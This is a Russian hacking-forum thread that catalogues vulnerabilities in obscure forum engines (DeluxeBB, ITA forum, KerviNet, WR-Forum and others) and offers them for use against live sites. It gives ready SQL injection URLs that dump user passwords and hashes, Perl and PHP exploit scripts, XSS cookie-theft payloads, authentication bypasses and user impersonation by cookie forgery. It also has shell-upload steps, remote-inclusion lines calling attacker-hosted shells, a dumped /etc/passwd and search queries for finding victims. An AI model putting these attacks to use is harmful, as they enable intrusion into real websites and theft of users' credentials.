Форумы [Обзор уязвимостей в форумных движках]

Discussion in 'Уязвимости CMS/форумов' started by Grey, 15 Apr 2007.

  1. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    [Обзор уязвимостей в форумных движках]

    ----------------------------------------------------------------

    Так же обратите внимание на темы:













    ----------------------------------------------------------------

    Эти темы так же могут быть вам полезны:


    - в этой теме вы сможете найти ответы на наиболее частые вопросы.

    ----------------------------------------------------------------

    В этой теме будут выкладываться уязвимости, разных не очень популярных форумных движков.

    ----------------------------------------------------------------
     
    #1 Grey, 15 Apr 2007
    Last edited: 4 Oct 2008
    11 people like this.
  2. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: DeluxeBB
    Версия: <= 1.06


    Уязвимость в сценарие misc.php, из за недостаточной обработки данных в параметре name можно осуществить SQL инъекцию.

    Code:
    misc.php?sub=profile&name=0')+UNION+SELECT+1,concat(database(),char(58),version(),char(58),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    Пароль пользователя:

    Code:
    misc.php?sub=profile&name=0')+UNION+SELECT+1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+deluxebb_users+where+uid=1/*
    где uid= - номер пользователя

    Эксплойт:

    Code:
    #!/usr/bin/perl
    
    # coded by k1b0rg
    
    use LWP::UserAgent;
    use strict;
    my $site=$ARGV[0];
    my $id=$ARGV[1];
    my $browser = LWP::UserAgent->new() or die;
    my $res=$browser->get($site.'misc.php?sub=profile&name=0\')+UNION+SELECT+1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+deluxebb_users+where+uid='.$id.'/*');
    
    if($res->content=~m!<font class="misctext">([a-f0-9]{32})</font>!i)
    {
    print 'Hash for userid='.$id.': ['.$1.']';
    }
    else
    {
    print 'Exploit failed.';
    }
    Использование эксплойта:

    путь к эксплойту сайт и путь до форума номер пользователя

    c:\expl.pl http://site.com/forum/ 1

    Сайт и путь до форума писать слитно:

    http://site.com/forum/ - если форум в директорие forum
    http://site.com/bb/ - если форум в директорие bb
    http://site.com/ - если форум в корневом каталоге сайта

    Резултат работы эксплойта - хеш (md5) пароля выбранного пользователя.

    Пример уязвимости:

    Code:
    http://82.212.43.253/c_forum/misc.php?sub=profile&name=0')+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    Уязвимость под относительно старые форумы - всетреить такие можно не часто, особенно если учесть что сами движки форумов не сильно распространены.

    ------------------------------------------------------------------

    Форум: DeluxeBB
    Версия: <= 1.06


    Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг.

    Уязвимых сценариев несколько:

    Code:
    http://site.com/templates/deluxe/postreply.php?templatefolder=[file]
    
    http://site.com/templates/deluxe/posting.php?templatefolder=[file]
    
    http://site.com/templates/deluxe/pm/newpm.php?templatefolder=[file]
    
    http://site.com/templates/default/postreply.php?templatefolder=[file]
    
    http://site.com/templates/default/posting.php?templatefolder=[file]
    
    http://site.com/templates/default/pm/newpm.php?templatefolder=[file]
    При проверки узявимости

    Code:
    http://site.com/templates/deluxe/postreply.php?templatefolder=123
    вылезала ошибка из которой было видно что к строке добавляеться /posticons.php (т.е. в результате строка выглядела 123/posticons.php), что отлично исправляеться добавлением к строке %00, т.е. в результате запрос долже выглядить так:

    Code:
    http://site.com/templates/deluxe/postreply.php?templatefolder=[file]%00
     
    #2 Grey, 15 Apr 2007
    Last edited: 2 May 2008
    3 people like this.
  3. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: DeluxeBB
    Версия: <= 1.07


    Для этой версии есть эксплойт для получения админских привилегий.

    Эксплойт:

    Code:
    #!/usr/bin/perl
    # DeluxeBB <= 1.07 Create Admin Exploit
    #
    ## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net
    # ./2006-6-25
    ### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net
    
    use IO::Socket; 
    use LWP::UserAgent;
    use HTTP::Cookies;
    
    
    $host = $ARGV[0];
    $uname = $ARGV[1];
    $passwd = $ARGV[2];
    $url = "http://".$host;
    
    print q(
    ###########################################################
    #          DeluxeBB <= 1.07 Create Admin Exploit          # 
    #           www.hackerz.ir - www.h4ckerz.com              #
    ################### Coded By Hessam-x #####################
    
    );
    
    
    
    if (@ARGV < 3) {
    print " #  usage : hx.pl [host&path] [uname] [pass]\n"; 
    print " #  E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n"; 
      exit();
    }
    
      
        print " [~] User/Password : $uname/$passwd \n";
        print " [~] Host : $host \n";
        print " [~] Login ... ";
    
    
    
    # Login In DeluxeBB <= 1.07 Create Admin Exploit
    
    $xpl = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new();
    
    $xpl->cookie_jar( $cookie_jar );
    $res = $xpl->post($url.'misc.php',
    Content => [
    "sub" => "login",
    "name" => "$uname",
    "password" => "$passwd",
    "submit" => "Log-in",
    "redirect" => "",
    "expiry" => "990090909",
    ],);
    
      if($cookie_jar->as_string =~ /memberpw=(.*?);/) { 
      print "successfully .\n";
      } else { 
      print "UNsuccessfully !\n";
      print " [-] Can not Login In $host !\n"; 
      print $cookie_jar->as_string;
      exit(); 
      }
    
      # Creat Admin :)
    
    $req = $xpl->get($url.'cp.php?sub=settings&[email protected]&xhideemail=0
    &xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&xsite=&languagex=
    English&skinx=default&xthetimeoffset=0&xthedateformat=d.m.y&xthetimeformat=12
    &invisiblebrowse=0&markposts=15&submit=Update');
    $tst = $xpl->get($url.'index.php');
    if ($tst->as_string =~ /Admin Cp/) { 
    print " [+] You Are Admin Now !!";
    } else {
        print " [-] Exploit Failed !";
        }
    
    # milw0rm.com [2006-06-25]
    Использование эксплойта:

    путь к эксплойту сайт и путь до форума ваш логин ваш пароль

    c:\expl.pl http://site.com/forum/ grey 123123

    Сайт и путь до форума писать слитно:

    http://site.com/forum/ - если форум в директорие forum
    http://site.com/bb/ - если форум в директорие bb
    http://site.com/ - если форум в корневом каталоге сайта

    Резултат работы эксплойта - получение админских привилегий.

    ------------------------------------------------------------------

    Форум: DeluxeBB
    Версия: <= 1.9


    Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг.

    На этот раз уязвим сценарий sig.php.

    PHP:
    <?php
    if($settings['smilies']=='on')
    {
    include(
    $templatefolder.'/smilies.php');
    }
    ?>
    Из кода видно что для инклюда необходимо вывполнение условия $settings['smilies']=='on', а так же наличие %00, т.к. к строке будет добавляться /smilies.php.

    В результате:

    Code:
    http://site.com/templates/deluxe/cp/sig.php?settings[smilies]=on&templatefolder=[file]%00
    где [file] - файл, который будет инклюдиться, а settings[smilies]=on присвоение переменной необходимого для инклюда значения.
     
    #3 Grey, 15 Apr 2007
    Last edited: 2 May 2008
    1 person likes this.
  4. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: WR-Форум
    Версия: 1.8

    Стандартный пароль который изначально стоит на форуме (на админку /admin.php) - admin. Конечно врятли что его не сменили но всё таки попробывать можно.

    Есть несколько активных XSS.

    В профиле в полях:

    1. Откуда - скрипт будет срабатывать при просмотре страницы Участники.
    2. Домашняя страничка - скрипт будет срабатывать при просмотре страницы Участники.

    3. Подпись - скрипт будет срабатывать при просмотре сообщений в темах.

    Вводим <script>alert();</script>

    4. При регистрации создаём пользователя с именем <script>alert();</script> - почти на каждой странице будет срабатывать ваш код.

    Куки пользователя выглядят примерно так:

    wrfcookies=Grey%7C123%7C1176741104%7C1176741104%7C

    %7C123%7C1176741104%7C1176741104%7C - это аски коды, если представить как символы то получиться, такая строка:

    |123|1176741104|1176741104|

    где |123| - пароль пользователя

    Куки админа выглядят так:

    frcookies=1%7Cadmin%7C1176740994%7C

    Опять же если представить аски коды как символы то получиться:

    1|admin|1176740994|

    где |admin| - пароль к админ-центру

    Видно что пароли не только не шифруються, но и храняться в куках, имею активную xss достать куки будет не сложно.

    ------------------------------------------------------------

    Заливка шелла:

    http://forum.antichat.ru/showpost.php?p=380128&postcount=18

    ------------------------------------------------------------

    Скачать форум можно здесь: http://wr-script.ru/

    Для поиска сайтов с таким форумом вводим: Powered by WR-Forum

    Кстати сайтов с таким форумом не так уж и мало:

    __http://www.google.ru/search?hl=ru&q=Powered+by+WR-Forum&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
     
    #4 Grey, 16 Apr 2007
    Last edited: 9 Dec 2007
    6 people like this.
  5. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: RonForum
    Версия: v30

    Доступ в админку:

    Если открыть файл admin.php и посмотреть его содержимое, то можно встретить такую строку:

    PHP:
    if(isset($entrance) and $entrance=="1")
    Эта строка идёт после проверки пароля вводе пароля, содержимого куков, но изначально никакого значения эта переменная не имеет, ей только присваиваеться значение в случае, если пароль введён правильно.

    Переходим в админку:

    http://site.com/from/admin.php

    Теперь присваиваем переменной entrance необходимое значение 1:

    http://site.com/from/admin.php?entrance=1

    Теперь вы в админке, но есть не большой минус: при переходе по любой ссылке, значение переменной будет утеряно, что бы этого не случилось смотрим адрес ссылки, к примеру:

    http://site.com/from/admin.php?what=moderators

    и добавляем к ней необходмиое значение:

    http://site.com/from/admin.php?entrance=1&what=moderators

    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Copyright © Kwasnikov R.P

    ------------------------------------------------------------
    ------------------------------------------------------------

    Форум: ParkerForum
    Версия: 0.01

    Активная XSS

    В поле Сайт, при создание новой темы вводим <script>alert();</script> - скрипт будет выплняться при просмотре главной страницы форума, а так же при просмотре темы.

    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Copyrights (C) by ademan

    ------------------------------------------------------------
    ------------------------------------------------------------

    Форум: Древообразный форум
    Версия: 1.0

    Активная XSS

    Уязвимы поля Name и Subject.

    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Скрипт предоставлен www.chemport.ru
     
    #5 Grey, 17 Apr 2007
    Last edited: 9 Dec 2007
    2 people like this.
  6. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    tForum <= b0.915
    Форум малораспространённый, но всё же.

    Активная XSS в поле "Message".



    Code:
    http://www.target/path/message.php

    Вставляем в поле "Message":


    Code:
    [img]javascript:alert(document.cookie)[/img]

    В кукисах сессия, логин.


    Ссылка для поиска в Google:

    Code:
    _http://www.google.ru/search?hl=ru&newwindow=1&q=Powered+by%3A+tForum&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
    
     
    2 people like this.
  7. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: KerviNet
    Версия: 1.1

    Из-за отсутствия фильтрации параметров, есть возможность осуществить SQL инъекцию.

    Сценарий topic.php.
    Уязвим параметр forum.

    ------------

    PHP:
    $mysql->query("SELECT name FROM forums WHERE id_forum = ".$forum);

    Параметр передаёться, как есть, без какой либо фильтрации.

    ------------

    Делаем запрос к базе данных:

    topic.php?forum=-1+union+select+1/*

    Таблица с пользователями:

    topic.php?forum=-1+union+select+1+from+users/*

    Вывод логина, пароля и мыла пользователя:

    topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users/*

    В результате запроса получаем: 1:TEST:123:[email protected]

    где 1 - номер пользователя, TEST - имя пользователя, 123 - пароль пользователя, заметьте пароль храниться в незашифрованном виде, [email protected] - мыло пользователя
    char(58) - это символ ':' который в нашем случае служит разделителем.

    Перебор пользователей:

    topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+0,1/*
    topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+1,1/*
    topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+2,1/*

    Code:
    http://site.com/forum/topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+0,1/*
    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Copyright KerviNet © 2005-2007

    ------------------------------------------------------------
    ------------------------------------------------------------

    Форум: XMB
    Версия: 1.5

    Активная XSS

    Уязвим параметр MSN.

    При регистрации пользователя в поле MSN вводим <script>alert();</script>, скрипт будет срабатывать при просмотре профиля пользователя.

    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Powered by XMB
     
    #7 Grey, 18 Apr 2007
    Last edited: 5 Sep 2007
    1 person likes this.
  8. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: ITA forum
    Версия: 1.21
    Версия: 1.31
    Версия: 1.49

    Из-за отсутствия фильтрации параметров, есть возможность осуществить SQL инъекцию.

    Сценарий showforum.php.
    Уязвим параметр fid.

    ------------

    PHP:
    $trs mysql_query("SELECT forumtitle, locked FROM itaf_forum WHERE forumid = '$fid'");
    Параметр передаёться, как есть, без какой либо фильтрации.

    ------------

    Делаем запрос к БД и в результате получам имя и хеш (mysql4) пароля пользователя:

    Code:
    http://site.ru/forum/showforum.php?fid='+union+select+concat(id,char(58),user_name,char(58),user_pass),2+from+itaf_user+limit+0,1/*
    Перебираем пользователей:

    Code:
    http://site.ru/forum/showforum.php?fid='+union+select+concat(id,char(58),user_name,char(58),user_pass),2+from+itaf_user+limit+1,1/*
    http://site.ru/forum/showforum.php?fid='+union+select+concat(id,char(58),user_name,char(58),user_pass),2+from+itaf_user+limit+2,1/*
    ------------

    Для удобства написал небольшой слойт, который выдирает хеш пользователя (id пользователя задаёться):

    PHP:
    <?php

    // coded by Grey

    if($argc == 4)
    {
    $a file('http://'.$argv[1].$argv[2].'showforum.php?fid=\'+union+select+user_pass,2+from+itaf_user+where+id='.$argv[3].'/*');
    for(
    $i 0$i count($a); $i++)
    {
    if(
    eregi("[a-f0-9]{16,16}",$a[$i],$b))
    {
    echo(
    "\n");
    echo(
    $b[0]);
    echo(
    "\n");
    $t 1;
    break;
    }
    }
    if(
    $t != 1) { echo("Exploit failed"); }
    }
    else
    {
    echo(
    "\n");
    echo(
    'Usage: '.$argv[0].' site dir user_id');
    echo(
    "\n");
    echo(
    'Usage: '.$argv[0].' site.ru /forum/ 1');
    echo(
    "\n");
    }
    ?>
    Использование сплойта:

    php c:\exp.php site dir user_id

    php c:\exp.php site.ru /forum/ 1

    site - сайт
    dir - директория с форумом
    user_id - номер пользователя

    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Powered By: V1.21
    Для поиска сайтов с таким форумом вводим: Powered By: V1.31
    Для поиска сайтов с таким форумом вводим: Powered By: V1.49

    К сожалению можно встретить и пропатченную версию, в которой эта уязвимость исправленна.

    ------------------------------------------------------------
    ------------------------------------------------------------

    Другие уязвимости:

    1. Форум: ITA forum
    Версия: 1.31 (возможно и другие версии)
    Версия: 1.49 (возможно и другие версии)

    Пассивная XSS:

    Code:
    http://site.ru/search.php?Submit=true&search="><script>alert(123);</script>
    2. Форум: ITA forum
    Версия: 1.49 (возможно и другие версии)

    SQL инъекция:

    Code:
    http://site.ru/showuser.php?uid='+union+select+1,concat(user_name,char(58),user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+itaf_user/*
     
    #8 Grey, 18 Apr 2007
    Last edited: 5 Sep 2007
    4 people like this.
  9. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: Board
    Версия: 2.0

    1. SQL инъекция

    Сценарий view_all_topic.php.
    Уязвим параметр m_id.

    ------------

    PHP:
    $sql2="select m_id as reply,name,email,msg,date_format(m_date,'%d.%m.%Y %T') as date, subject from $dbtable where r_id =$m_id order by date";
    $result=mysql_query($sql2,$db);
    Параметр передаёться, как есть, без какой либо фильтрации.

    ------------

    Делаем запрос к БД в результате, логин, пароль (пароль не зашифрован) и мыло пользователя:

    Code:
    http://site.ru/forum/view_all_topic.php?m_id=-1+union+select+concat(id,char(58),name,char(58),password,char(58),email),2,3,4,5+from+board000_users/*
    2. Пасивная XSS

    В поиске вводим <script>alert();</script> - скрипт выпольнится.

    3. Активная XSS

    При создание темы/сообщения вписываем в поле заголовка сообщения или в текст сообщения <script>alert();</script> - скрипт будет выпольняться при ответе на данное сообщение/тему.

    4. Возможность заходить от любого пользователя, без ввода пароля.

    Смотрим содержимое куков:

    board_user_cook=qwerty; board_user_id=3

    board_user_cook - имя пользователя
    board_user_id - номер пользователя

    Теперь меняем эти значения:

    К примеру есть пользователь max и его номер 1:

    board_user_cook=max; board_user_id=1

    Всё теперь вы пользователь max.

    ------------

    В Опере значение куков менять так:

    Инструменты - Дополнительно - Cookies

    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Copyright ° CarLine 2002г.

    Не смотря на то, что форум старый сайтов с таким форумом достаточно много.

    ------------------------------------------------------------
    ------------------------------------------------------------

    Форум: ReForum
    Версия: 1.0

    SQL инъекция

    Уязвим параметр viewth.

    Code:
    http://site.ru/forum/?viewth=2
    http://site.ru/forum/index.php?viewth=2
    ------------------------------------------------------------
     
    #9 Grey, 18 Apr 2007
    Last edited: 20 Apr 2007
    2 people like this.
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: Trofimov forum
    Версия: v1.2

    Активная XSS в поле Имя.

    Скрипт срабатывает после добавления темы (страница forum.php).

    ------------------------------------------------------------
    ------------------------------------------------------------

    Форум: TROforum
    Версия: 0.3

    Из-за не коректной обработки параметров, можно войти в админку имея только пароль:

    PHP:
    if ($password != "$admin_login&& $password != "$admin_password")
    Как видно из этой строки войти в админку можно имея вместо пароля логин.
    Изначально логин - login.

    Но перед этим условием стоит условие:

    PHP:
    if ($password != "$admin_login&& $password != "$admin_password")
    Само условие не верно, т.к. оно звучит так: Если Логин И Пароль не верны, то прекратить выполнение скрипта.

    Из условия следует, что если только логин или пароль будет неверным, то работу скрипта прекращать не следует.

    Имя только логин (а его угадать проще(login, admin или просто имя админа)), можно получить полный доступ к админке:

    Code:
    http://site.ru/forum/admin/admin.php?login=login&password=login
    Таким образом переменным login и password присваиваются необходимые для входа значения.

    Но здесь всё проще - файл настроек не требует авторизации:

    Code:
    http://site.ru/forum/admin/update.php
    А именно в этом файле хранятся Логин и Пароль, сменить которые не составит труда.

    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Powered by: TROforum 0.3
     
    #10 Grey, 22 Apr 2007
    Last edited: 22 Apr 2007
    3 people like this.
  11. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: pHpAS
    Версия: 1.26

    1. Активная XSS.

    1) При ответе в теме в поля Title и Name вставляем скрипт <script>alert();</script>.

    Скрипт будет выполняться при про смотре коментариев.

    2) При создание темы (/admin - пароль здесь не нужен) в полях Title и Text вводим <script>alert();</script>.

    Скрипт будет выполнятся как на странице admin/index.php так и на /index.php.

    2. SQL инъекция.

    Уязвимость в сценарие show.php в параемтре id.

    Code:
    http://site.ru/forum/show.php?id=-1+union+select+1,2,3,4/*
    Не смотря на то, что на форуме нет пользователей, сама sql инъекция даёт возможность обращаться к другим таблицам (к примеру к таблицам, используемым движком сайта).

    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Powered By: pHpAS 1.26

    ------------------------------------------------------------
    ------------------------------------------------------------

    Форум: electrifiedForum
    Версия: v1.70

    1. Пасивная XSS.

    Code:
    http://site.ru/forum/index.php?action=displaythread&forum=chat&id=<script>alert();</script>
    Есть еще одна но, она будет выполняться только с админскими привилегиями:

    Code:
    http://site.ru/forum/index.php?action=userinfo&user=<script>alert();</script>
    2. Активная XSS.

    1) В личке в поле Subject пишем <script>alert();</script>, скрипт будет выполняться при просмотре личной почты.

    2) В профиле в подписе (Signature) пишем <script>alert();</script>, скрипт будет выполняться при просмотре сообщений на форуме.

    3) На форуме при создание темы в поле Title пишем <script>alert();</script>, скрипт будет выполняться при ответе на сообщение.

    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: Powered By electrifiedForum v1.70
     
    #11 Grey, 23 Apr 2007
    Last edited: 23 Apr 2007
    3 people like this.
  12. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: He11.net Forums
    Версия: 1.0

    1. Пасивная XSS.

    Code:
    http://site.ru/forum/index.php?top_message=<script>alert();</script>
    2. SQL инъекция.

    1)
    Code:
    http://site.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9,10,11,12+from+Dragon_users/*
    в результате получаем строку вида:

    1:grey:202cb962ac59075b964b07152d234b70:123

    В базе данных хранится и зашифрованный пароль (md5) и пароль в чистом виде.

    2)
    Code:
    http://site.ru/forum/view_thread.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),6,7,8,9+from+Dragon_users/*
    ------------------------------------------------------------

    Для поиска сайтов с таким форумом вводим: "View Today's Active Topics"

    Пример уязвимого форума:

    __http://sims2.h10.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9,10,11,12+from+Dragon_users/*

    ------------------------------------------------------------
    ------------------------------------------------------------

    Форум: UBB Threads
    Версия: 5.5

    Пассивная XSS:

    Code:
    http://site.ru/showprofile.php?Cat=&User=<script>alert();</script>
    Активная XSS:

    При создание сообщения на форуме в поле Сообщение вписываем скрипт, скрипт будет выполняться при просмотре темы.

    Заливка шелла:

    Заходим в админку - Includes, редактируем (вписываем шелл) любой из файлов (Header, Footer и т.д.).

    Шелл будет доступен по адресу:

    http://site.ru/includes/header.php
     
    #12 Grey, 24 Apr 2007
    Last edited: 14 Jun 2007
    4 people like this.
  13. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Форум FastBB 9.20

    1. Возможности писать в закрытые темы.

    Необходимо зайти в закрытую тему, в адресной строке поменять №1 на №6 - и
    попадаешь на страницу создания сообщения. Пишешь сообщение, отправляешь и оно
    появляется в теме.
     
    2 people like this.
  14. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Форум: Ultimate PHP Board

    Необходимо зарегестрироватся.Регестрируемся и запоминаем что мы написали.
    Теперь самое интересное - использование уязвимости. Баг в форуме в том что у всех зарегестрированных пользователей есть права на просмотр файлов:
    _http://www.forum.de/forum/admin.php - панель администратора.
    _http://www.forum.de/forum/admin_forum.php - администрирование форумами.
    _http://www.forum.de/forum/admin_members.php - позволяет редактировать пользователей.
    _http://www.forum.de/forum/admin_config.php - панель настройки форума.
    Идем на _http://www.forums.de/forum/admin_members.php и перед нами список пользователей. Ставим себе права админа, перезаходим, удаляем бывших админов и форум ваш! ;)
     
    1 person likes this.
  15. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    Форум: Anyboard все версии
    Локальный инклуд файлов в параметре vf
    Например на сайте производителя:

    Code:
    [COLOR=DarkOrange]http://www.anyboard.net/cgi-bin/anyboard.cgi/rec/Party_and_Poultry_Information_Exchange/-=ab=-/index.html?cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D[/COLOR]
    Code:
    ______________________________________________
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    http://www.google.ru/search?q=inurl:?cmd=retr
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    rpm:x:37:37::/var/lib/rpm:/sbin/nologin
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    apache:x:48:48:Apache:/var/www:/sbin/nologin
    squid:x:23:23::/var/spool/squid:/sbin/nologin
    webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
    xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    gdm:x:42:42::/var/gdm:/sbin/nologin
    alias:x:500:500::/var/qmail/alias:/bin/bash
    qmaild:x:501:500::/var/qmail:/bin/bash
    qmaill:x:502:500::/var/qmail:/bin/bash
    qmailp:x:503:500::/var/qmail:/bin/bash
    qmailq:x:504:501::/var/qmail:/bin/bash
    qmailr:x:505:501::/var/qmail:/bin/bash
    qmails:x:506:501::/var/qmail:/bin/bash
    vpopmail:x:507:502::/home/vpopmail:/bin/bash
    named:x:25:25:Named:/var/named:/sbin/nologin
    exim:x:93:93::/var/spool/exim:/sbin/nologin
    ________________________________________________
     
    #15 l1ght, 14 May 2007
    Last edited: 2 Mar 2009
    6 people like this.
  16. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    XSS уязвимость на Intellect Board 2.12

    XSS уязвимость на Intellect Board 2.12

    Была найдена XSS уязвимость в форумном движке Intellect Board 2.12.
    Устранение:
    Обновить скрипты.
    Уязвимость: можно в качестве адреса домашней страницы или ЖЖ поставить javascript:. А дальше - классическая XSS: перехватываем идентификатор сессии админа и влезаем в АЦ. Правда, сделать это не так уж и просто: по умолчанию там выполняется привязка сессии к HTTP_USER_AGENT, да и время жизни сессии ограничено несколькими часами.
     
    2 people like this.
  17. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    ExBB
    Описание:Баг из-за недостаточной проверки подключаемых файлов в скрипте usertstop.php
    Эксплоит : http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://yourshell

    VistaBB <= 2.x
    Описание:Баг в проверке передаваемого юзером поля Cookie в HTTP-запросе
    Позволяет выполнять произвольные команды
    Эксплоит : http://milw0rm.com/exploits/2251

    Woltlab Burning Board 2.3.5
    Описание:Баг в модуле links.php приводит к выполнению произвольных sql-запросов
    Эксплоит : http://milw0rm.com/exploits/2197
    Эксплоит : http://milw0rm.com/exploits/1810

    MiniBB <=1.5
    Описание:Через уязвимый скрипт com_minibb.php можно загрузить шелл на уязвимую машину
    Эксплоит : http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?

    MyBB < 1.1.3
    Описание:Эксплоит позволяет выполнять произвольные команды на сервера
    Эксплоит :http://milw0rm.com/exploits/1909

    PHORUM 5
    Описание:Эксплоит работает с register_globals=On и magic_quotes_gpc=Off
    Эксплоит : http://milw0rm.com/exploits/2008

    UBB Threads

    1.UBBThreads 5.x,6.x
    Описание:Работает с register_globals on
    Уязвимый скрипт ubbt.inc.php позволяет просматривать файлы на сервере

    2.UBB.threads >= 6.4.x
    Описание:Баг в скрипте голосования позволяет выполнять произвольные команды через скрипт атакующего
    Эксплоит : */addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id

    Zix Forum
    Описание:Передаваемый параметр "layid" недостаточно проверяется в скрипте 'settings.asp' что приводит к sql-inj
    Эксплоит : site.com/zix/login.asp?layid=-1%20union%20select% 201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,
